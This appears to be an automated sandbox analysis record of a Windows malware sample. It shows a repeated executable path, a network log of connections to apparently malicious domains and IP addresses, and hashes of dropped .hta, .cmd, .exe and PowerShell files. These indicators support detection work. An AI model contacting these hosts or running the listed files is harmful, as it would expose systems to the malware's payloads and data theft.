"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
RU 185.215.113.16:80 185.215.113.16 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
DE 104.194.157.122:80 104.194.157.122 tcp
US 8.8.8.8:53 calmingtefxtures.run udp
US 104.21.90.174:443 calmingtefxtures.run tcp
N/A 127.0.0.1:49372 tcp
US 8.8.8.8:53 youtube.com udp
NL 142.251.36.46:443 youtube.com tcp
NL 142.251.36.46:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
NL 142.251.36.46:443 youtube.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
NL 142.250.179.142:443 youtube-ui.l.google.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
NL 142.250.179.142:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
NL 172.217.23.206:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
NL 172.217.23.206:443 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.prod.mozaws.net tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
NL 172.217.168.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 www.google.com udp
NL 172.217.168.196:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:49380 tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.16.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.73:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
NL 142.250.179.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
NL 142.250.179.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r3---sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3---sn-aigzrnsl.gvt1.com tcp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 r3.sn-aigzrnsl.gvt1.com udp
GB 74.125.168.232:443 r3.sn-aigzrnsl.gvt1.com udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 34.107.152.202:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 privileggoe.live udp
US 104.21.16.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 172.67.164.79:443 tracnquilforest.life tcp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 privileggoe.live udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 collapimga.fun udp
US 104.21.16.85:443 collapimga.fun tcp
US 104.21.16.85:443 collapimga.fun tcp
US 104.21.16.85:443 collapimga.fun tcp
US 8.8.8.8:53 towerbingobongoboom.com udp
DE 93.186.202.3:4000 towerbingobongoboom.com tcp
DE 93.186.202.3:5111 towerbingobongoboom.com tcp
NL 172.217.23.206:443 consent.youtube.com udp
NL 172.217.23.206:443 consent.youtube.com tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 8.8.8.8:53 hobbyedsmoker.live udp
US 8.8.8.8:53 dsfljsdfjewf.info udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 decreaserid.world udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 172.67.137.158:443 disobilittyhell.live tcp
GB 45.155.103.183:1488 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 go.advisewise.me udp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 104.86.110.232:80 e6.o.lencr.org tcp
DE 116.203.10.65:443 go.advisewise.me tcp
US 172.67.137.158:443 disobilittyhell.live tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
DE 116.203.10.65:443 go.advisewise.me tcp
US 8.8.8.8:53 clients2.google.com udp
NL 172.217.168.196:443 www.google.com tcp
NL 142.251.36.46:443 clients2.google.com tcp
NL 172.217.168.196:443 www.google.com udp
US 8.8.8.8:53 clients2.googleusercontent.com udp
NL 142.250.179.129:443 clients2.googleusercontent.com udp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
US 8.8.8.8:53 apis.google.com udp
NL 172.217.168.206:443 apis.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
N/A 224.0.0.251:5353 udp
DE 116.203.10.65:443 go.advisewise.me tcp
N/A 127.0.0.1:9223 tcp
DE 116.203.10.65:443 go.advisewise.me tcp
N/A 127.0.0.1:9223 tcp

Files

memory/1328-0-0x00007FFFE1893000-0x00007FFFE1895000-memory.dmp

memory/1328-1-0x00000174A98F0000-0x00000174A9912000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uynit4zj.xzn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1328-11-0x00007FFFE1890000-0x00007FFFE2351000-memory.dmp

memory/1328-12-0x00007FFFE1890000-0x00007FFFE2351000-memory.dmp

memory/1328-15-0x00007FFFE1890000-0x00007FFFE2351000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 38e01d05f1a3c204a4b66f6503a154b4
SHA1 1f13df998e49ba099b8142117047ca78c7728826
SHA256 098383f853295ab4ca31292fc72f149c4d737544f973232a84f48ba060076610
SHA512 d4cf12cc636128328bca08bfefdb5cbd3d7e3fa0b9ab8de99734a9af67c18224146000e2a5b79ad3fcfbcef27290e93fcd8f9c0979c8dd95e47e123b479cbed5

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5cf871727b8b96e5a787e82a712feab6
SHA1 7200ef7316b0476f9375a482b665516246a5287e
SHA256 eff93574ba907abd5a81203d36531e891326fcd091f2a0a187654c1dbc87b48d
SHA512 27a8ad57def06297f58108ffbddf248ddbc95d60415a6a303dae68ebf76e1ee17ce2015d74ad291f013e209fb9d339f82b072cc62262ae66cf4efd21d21a05da

C:\Temp\yJ5bncm9F.hta

MD5 16d76e35baeb05bc069a12dce9da83f9
SHA1 f419fd74265369666595c7ce7823ef75b40b2768
SHA256 456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA512 4063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e89c193840c8fb53fc3de104b1c4b092
SHA1 8b41b6a392780e48cc33e673cf4412080c42981e
SHA256 920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c
SHA512 865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

MD5 139801ec12921d4a10cade0e8bd14581
SHA1 19e4ea0a6204a9256bb2671aec86b1942d0bb63c
SHA256 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796
SHA512 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601

memory/2808-88-0x0000000001240000-0x000000000129F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035810101\942382b6ad.exe

MD5 454bd2cde5257315f133cfc64bcd0351
SHA1 ccfb541cc802100b3d0bc4c4147bf0363675be2b
SHA256 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580
SHA512 da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f

C:\Users\Admin\AppData\Local\Temp\B9yFyWSkE.hta

MD5 7bfd3034074983264c6c2e9f0ac0cc70
SHA1 9ae0e83c32d3236b4d1b01196461ecf1bfe80919
SHA256 df4f78267bc59c89675c0c501f3e0e3a0cc995ca9434eec1e970b75afdcc647c
SHA512 4ab1bc68cacb15337a7656f244a676da5457cbf87a24445b2539267df5ca49a3af631cf975366eebe5272d4635c86ab4e21d0b9b9f90416c8c9e88685313fc4f

memory/2424-112-0x0000000002950000-0x0000000002986000-memory.dmp

memory/2424-113-0x00000000050B0000-0x00000000056D8000-memory.dmp

memory/2424-114-0x0000000004F90000-0x0000000004FB2000-memory.dmp

memory/2424-115-0x0000000005890000-0x00000000058F6000-memory.dmp

memory/2424-116-0x0000000005900000-0x0000000005966000-memory.dmp

memory/2424-126-0x0000000005A70000-0x0000000005DC4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8d80c45e0e047b75073a3d1c2710c68f
SHA1 babc73cf30327b36d184239a2747ec94d48929f4
SHA256 6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64
SHA512 5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24

memory/2424-128-0x0000000005F40000-0x0000000005F5E000-memory.dmp

memory/2424-129-0x0000000005FE0000-0x000000000602C000-memory.dmp

memory/2424-130-0x0000000007700000-0x0000000007D7A000-memory.dmp

memory/2424-131-0x00000000063C0000-0x00000000063DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

memory/2424-144-0x00000000066B0000-0x00000000066D2000-memory.dmp

memory/2424-143-0x0000000007460000-0x00000000074F6000-memory.dmp

memory/2424-145-0x0000000008330000-0x00000000088D4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9dbfc717f4c664787adf2af2b9aeb748
SHA1 b2b3a001709a45573654ec8fb371d404152a35d9
SHA256 2dd4eb670e40d6ae88e9a23c97ca79c313b30692e3f5ef97f24c7ab9d792448b
SHA512 ee055d0161718d97552b86fbe1b0bdfe62756d84f013d7f3b9c83e2da694a5b05386ec7f00ff09408203d09e2322d27b1f6a89bec45ebda44d76debaa492df82

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 25604a2821749d30ca35877a7669dff9
SHA1 49c624275363c7b6768452db6868f8100aa967be
SHA256 7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476
SHA512 206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

memory/2756-168-0x0000000005690000-0x00000000059E4000-memory.dmp

memory/2756-179-0x00000000062E0000-0x000000000632C000-memory.dmp

memory/1896-190-0x0000000005DD0000-0x0000000006124000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b68db814d76e01b50ff728c46b71b73f
SHA1 4ed710c02d86a9336e702fdca5b7f236ebd40f61
